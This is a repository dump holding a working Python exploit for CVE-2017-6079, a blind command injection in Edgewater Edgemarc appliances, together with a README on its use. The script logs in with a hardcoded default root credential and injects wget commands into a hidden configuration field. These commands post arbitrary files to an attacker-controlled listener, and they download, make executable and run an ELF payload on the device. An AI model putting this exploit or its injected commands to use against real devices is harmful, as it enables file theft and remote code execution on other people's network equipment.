├── CVE-2017-6079.py ├── README.md └── pics ├── README.md ├── nmap.png ├── read-exploit.png └── upload-exploit.png /CVE-2017-6079.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import socket 3 | import thread 4 | from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler 5 | import sys 6 | import shutil 7 | import os 8 | import random 9 | import string 10 | 11 | HEADER = '\033[95m' 12 | OKBLUE = '\033[94m' 13 | OKGREEN = '\033[92m' 14 | WARNING = '\033[93m' 15 | FAIL = '\033[91m' 16 | ENDC = '\033[0m' 17 | 18 | class RequestHandler(BaseHTTPRequestHandler): 19 | 20 | def do_GET(self): 21 | 22 | #request_path = self.path 23 | global data_flag 24 | print OKGREEN 25 | print "[#] Target Connected" 26 | print "[#] Uploading %s"%(self.path) 27 | if os.access(os.curdir + os.sep + self.path, os.R_OK): 28 | f = open(os.curdir + os.sep + self.path,'rb') #self.path has /test.html 29 | self.send_response(200) 30 | self.send_header('Content-type', 'application/zip') 31 | self.end_headers() 32 | self.wfile.write(f.read()) 33 | f.close() 34 | 35 | else: 36 | print FAIL 37 | print "requested file is not in Current Working Dir, Plz move it there !!" 38 | print ENDC 39 | data_flag = True 40 | def do_POST(self): 41 | global data_flag 42 | request_path = self.path 43 | 44 | print OKGREEN 45 | print "[#] Output Received ",ENDC 46 | #print(request_path) 47 | 48 | request_headers = self.headers 49 | content_length = request_headers.getheaders('content-length') 50 | length = int(content_length[0]) if content_length else 0 51 | 52 | #print(request_headers) 53 | print OKGREEN 54 | print(self.rfile.read(length)) 55 | print ENDC 56 | #print("<----- Request End -----\n") 57 | data_flag = True 58 | self.send_response(200) 59 | def log_request(self, code='-', size='-'): 60 | pass 61 | 62 | #do_PUT = do_POST 63 | #do_DELETE = do_GET 64 | 65 | def listener(): 66 | global server 67 | 68 | port = 80 69 | #print('Listening on localhost:%s' % port) 70 | server = HTTPServer(('', port), RequestHandler) 71 | server.serve_forever() 72 | #print "1" 73 | 74 | def read_file(TargetIP,AttackerIP,FilePath): 75 | auth = {"Authorization": "Basic cm9vdDpkZWZhdWx0"} 76 | payload = { 77 | "mainFormSubmitAction":"", 78 | "udefsEntries":"wget --post-file %s http://%s"%(FilePath,AttackerIP), 79 | "applyConfig":"1", 80 | "saveConfig":"" 81 | } 82 | 83 | print OKBLUE 84 | print "[*] Reading '%s'"%(FilePath),ENDC 85 | r = requests.post("http://%s/cgi-bin/config?page=50&form=mainForm"%(TargetIP),headers=auth,data=payload)#, proxies=proxyDict) 86 | 87 | def upload_file(TargetIP,AttackerIP,FileName): 88 | global payload_name 89 | payload_name = ''.join(random.choice(string.ascii_uppercase) for _ in range(5)) 90 | auth = {"Authorization": "Basic cm9vdDpkZWZhdWx0"} 91 | payload = { 92 | "mainFormSubmitAction":"", 93 | "udefsEntries":"wget -O /tmp/%s http://%s/%s"%(payload_name,AttackerIP,FileName), 94 | "applyConfig":"1", 95 | "saveConfig":"" 96 | } 97 | print OKBLUE 98 | print "[*] Forcing the target to connect to us ",ENDC 99 | #print OKBLUE,"[*] Reading '%s'"%(FilePath),ENDC 100 | r = requests.post("http://%s/cgi-bin/config?page=50&form=mainForm"%(TargetIP),headers=auth,data=payload)#, proxies=proxyDict) 101 | 102 | def execute_payload(TargetIP): 103 | auth = {"Authorization": "Basic cm9vdDpkZWZhdWx0"} 104 | payload = { 105 | "mainFormSubmitAction":"", 106 | "udefsEntries":"chmod 755 /tmp/%s\n/tmp/%s"%(payload_name,payload_name), 107 | "applyConfig":"1", 108 | "saveConfig":"" 109 | } 110 | 111 | #print OKBLUE,"[*] Reading '%s'"%(FilePath),ENDC 112 | r = requests.post("http://%s/cgi-bin/config?page=50&form=mainForm"%(TargetIP),headers=auth,data=payload)#, proxies=proxyDict) 113 | 114 | def print_banner(): 115 | print FAIL,""" 116 | 117 | _____ _ _ 118 | | ____|__| | __ _ _____ ____ _| |_ ___ _ __ 119 | | _| / _` |/ _` |/ _ \ \ /\ / / _` | __/ _ \ '__| 120 | | |__| (_| | (_| | __/\ V V / (_| | || __/ | 121 | |_____\__,_|\__, |\___| \_/\_/ \__,_|\__\___|_| 122 | |___/ 123 | _____ _ 124 | | ____|__| | __ _ ___ _ __ ___ __ _ _ __ ___ 125 | | _| / _` |/ _` |/ _ \ '_ ` _ \ / _` | '__/ __| 126 | | |__| (_| | (_| | __/ | | | | | (_| | | | (__ 127 | |_____\__,_|\__, |\___|_| |_| |_|\__,_|_| \___| 128 | |___/ 129 | _____ _ _ _ 130 | | ____|_ ___ __ | | ___ (_) |_ 131 | | _| \ \/ / '_ \| |/ _ \| | __| 132 | | |___ > <| |_) | | (_) | | |_ 133 | |_____/_/\_\ .__/|_|\___/|_|\__| 134 | |_| 135 | 136 | 137 | Edgewater Edgemarc Exploit CVE-2017-6079 138 | Coded By: Mostafa Soliman""",ENDC 139 | def usage(): 140 | print """ 141 | [USAGE] %s [operation] [TargetIP] [AttackerIP] [FilePath] 142 | operation: Either read / upload 143 | AttackerIP: IP address to receive the connection on 144 | TargetIP: IP address of the target running Edgewater Edgemarc server 145 | FilePath: Remote file to download in case of "read" operation 146 | Local file to upload in case of "upload" operation 147 | """%(sys.argv[0]) 148 | exit() 149 | def main(): 150 | global data_flag 151 | print_banner() 152 | data_flag = False 153 | if len(sys.argv) !=5: 154 | usage() 155 | operation = sys.argv[1] 156 | TargetIP = sys.argv[2] 157 | AttackerIP = sys.argv[3] 158 | FilePath = sys.argv[4] 159 | 160 | if "upload" != operation.lower() and "read" != operation.lower(): 161 | print FAIL,"Wrong Operation",ENDC 162 | usage() 163 | thread.start_new_thread( listener ,()) 164 | 165 | if "read" == operation.lower(): 166 | 167 | read_file(TargetIP,AttackerIP,FilePath) 168 | while not data_flag: 169 | pass 170 | server.shutdown() 171 | elif "upload" == operation.lower(): 172 | upload_file(TargetIP,AttackerIP,FilePath.split("/")[-1]) 173 | #copy the file to the cwd 174 | #shutil.move(FilePath, os.path.join(".", filename)) 175 | while not data_flag: 176 | pass 177 | server.shutdown() 178 | print "[#] Executing The Payload",ENDC 179 | execute_payload(TargetIP) 180 | 181 | 182 | if __name__ == "__main__": 183 | 184 | 185 | main() -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Introduction 2 | ============ 3 | This exploit was developed based on the technical description by ```depthsecurity``` 4 | ``` 5 | https://depthsecurity.com/blog/cve-2017-6079-blind-command-injection-in-edgewater-edgemarc-devices 6 | ``` 7 | 8 | Description 9 | ============ 10 | The HTTP web-management application on Edgewater Networks Edgemarc appliances has a hidden page that allows for user-defined commands such as specific iptables routes, etc., to be set. You can use this page as a web shell essentially to execute commands, though you get no feedback client-side from the web application: if the command is valid, it executes. An example is the wget command. The page that allows this has been confirmed in firmware as old as 2006. 11 | 12 | Device Detection 13 | =============== 14 | Nmap will identify the device from its web server as shown 15 | ![Alt text](pics/nmap.png?raw=true "nmap") 16 | 17 | 18 | Usage 19 | ====== 20 | ``` 21 | _____ _ _ 22 | | ____|__| | __ _ _____ ____ _| |_ ___ _ __ 23 | | _| / _` |/ _` |/ _ \ \ /\ / / _` | __/ _ \ '__| 24 | | |__| (_| | (_| | __/\ V V / (_| | || __/ | 25 | |_____\__,_|\__, |\___| \_/\_/ \__,_|\__\___|_| 26 | |___/ 27 | _____ _ 28 | | ____|__| | __ _ ___ _ __ ___ __ _ _ __ ___ 29 | | _| / _` |/ _` |/ _ \ '_ ` _ \ / _` | '__/ __| 30 | | |__| (_| | (_| | __/ | | | | | (_| | | | (__ 31 | |_____\__,_|\__, |\___|_| |_| |_|\__,_|_| \___| 32 | |___/ 33 | _____ _ _ _ 34 | | ____|_ ___ __ | | ___ (_) |_ 35 | | _| \ \/ / '_ \| |/ _ \| | __| 36 | | |___ > <| |_) | | (_) | | |_ 37 | |_____/_/\_\ .__/|_|\___/|_|\__| 38 | |_| 39 | 40 | 41 | Edgewater Edgemarc Exploit CVE-2017-6079 42 | Coded By: Mostafa Soliman 43 | 44 | [USAGE] CVE-2017-6079.py [operation] [TargetIP] [AttackerIP] [FilePath] 45 | operation: Either read / upload 46 | AttackerIP: IP address to receive the connection on 47 | TargetIP: IP address of the target running Edgewater Edgemarc server 48 | FilePath: Remote file to download in case of "read" operation 49 | Local file to upload in case of "upload" operation 50 | ``` 51 | 52 | Exploit 53 | ======== 54 | The exploit assumes that the device has default root password which is ```default``` if this is not the case you will need to replace the ```Authorization``` 55 | The exploit has 2 modes of operation: 56 | #### 1. Read 57 | This mode allow the attacker to read any files on the vulnerable device. 58 | 59 | ![Alt text](pics/read-exploit.png?raw=true "read") 60 | 61 | 62 | #### 2. upload 63 | This mode allow the attacker to upload ELF file payload to ```/tmp/``` folder and execute it. 64 | You will need to start listner to recieve the connection. 65 | 66 | ![Alt text](pics/upload-exploit.png?raw=true "upload") 67 | 68 | -------------------------------------------------------------------------------- /pics/README.md: -------------------------------------------------------------------------------- 1 | pics 2 | -------------------------------------------------------------------------------- /pics/nmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit/7f2076033693d850fef3d29bb23cb9be0f6cf4ee/pics/nmap.png -------------------------------------------------------------------------------- /pics/read-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit/7f2076033693d850fef3d29bb23cb9be0f6cf4ee/pics/read-exploit.png -------------------------------------------------------------------------------- /pics/upload-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MostafaSoliman/CVE-2017-6079-Blind-Command-Injection-In-Edgewater-Edgemarc-Devices-Exploit/7f2076033693d850fef3d29bb23cb9be0f6cf4ee/pics/upload-exploit.png --------------------------------------------------------------------------------